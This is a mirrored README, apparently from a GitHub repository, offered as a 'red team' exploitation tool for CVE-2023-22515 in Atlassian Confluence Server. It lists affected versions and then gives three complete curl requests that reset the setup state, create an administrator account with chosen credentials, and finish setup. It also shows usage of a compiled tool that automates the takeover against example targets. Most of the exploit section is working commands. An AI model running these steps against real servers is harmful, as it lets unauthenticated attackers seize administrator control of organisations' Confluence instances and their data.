Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-22515 PoC — Atlassian Confluence Server 安全漏洞

Source
https://github.com/ad-calcium/CVE-2023-22515
Associated Vulnerability
Title:Atlassian Confluence Server 安全漏洞 (CVE-2023-22515)
Description:Atlassian Confluence Server是澳大利亚Atlassian公司的一套具有企业知识管理功能,并支持用于构建企业WiKi的协同软件的服务器版本。 Atlassian Confluence Server存在安全漏洞,该漏洞源于外部攻击者可能利用可公开访问的Confluence Data Center和Confluence Serve,用未知的漏洞来创建Confluence 管理员帐户并访问 Confluence 实例。
Description
Confluence未授权添加管理员用户(CVE-2023-22515)漏洞利用工具
Readme
# 红队工具-Confluence未授权添加管理员用户(CVE-2023-22515)漏洞利用工具

## 漏洞影响范围
```
8.0.0 <= Confluence Data Center and Confluence Server <= 8.0.4
8.1.0 <= Confluence Data Center and Confluence Server <= 8.1.4
8.2.0 <= Confluence Data Center and Confluence Server <= 8.2.3
8.3.0 <= Confluence Data Center and Confluence Server <= 8.3.2
8.4.0 <= Confluence Data Center and Confluence Server <= 8.4.2
8.5.0 <= Confluence Data Center and Confluence Server <= 8.5.1
```

## 漏洞利用

### 1.正常访问,提示已经完成安装
```
curl -vk http://IP/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false
```

### 2.创建管理员用户
```
test123 Password2
```
执行如下命令
```
curl -vk -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=test123&fullName=test123&email=test123@localhost&password=Password2&confirm=Password2&setup-next-button=Next" http://IP/setup/setupadministrator.action
```

### 3.设置已完成
```
curl -vk -X POST -H "X-Atlassian-Token: no-check" http://IP/setup/finishsetup.action
```

## 用法

```
cve-2023-22515.exe
Usage of cve-2023-22515.exe:
  -pass string
        指定要添加的密码
  -proxy string
        设置代理
  -u string
        指定目标
  -user string
        指定要添加的用户名
```

### 随机账号密码
```
cve-2023-22515.exe -u http://10.108.3.117:8090
```
![image-2023101116485852](images/Snipaste_2023-10-16_10-14-22.png)

### 手动添加管理员用户
```
cve-2023-22515.exe -u http://10.108.3.117:8090 -user tesxe17 -pass Password2
```
![image-20231011164858593](images/image-20231011164858593.png)


## 更新日志
```
[+] 2023/10/16 增加随机用户名密码
```


## Star History

[![Star History Chart](https://api.star-history.com/svg?repos=ad-calcium/CVE-2023-22515&type=Date)](https://star-history.com/#ad-calcium/CVE-2023-22515&Date)
File Snapshot

 [4.0K]  /data/pocs/e1f04a866f7b4e84b14684c05aabe11c074589f0
├── [  33]  go.mod
├── [4.0K]  images
│   ├── [ 15K]  image-20231011164412511.png
│   ├── [ 11K]  image-20231011164858593.png
│   └── [9.3K]  Snipaste_2023-10-16_10-14-22.png
├── [3.6K]  main.go
└── [1.9K]  README.md

1 directory, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.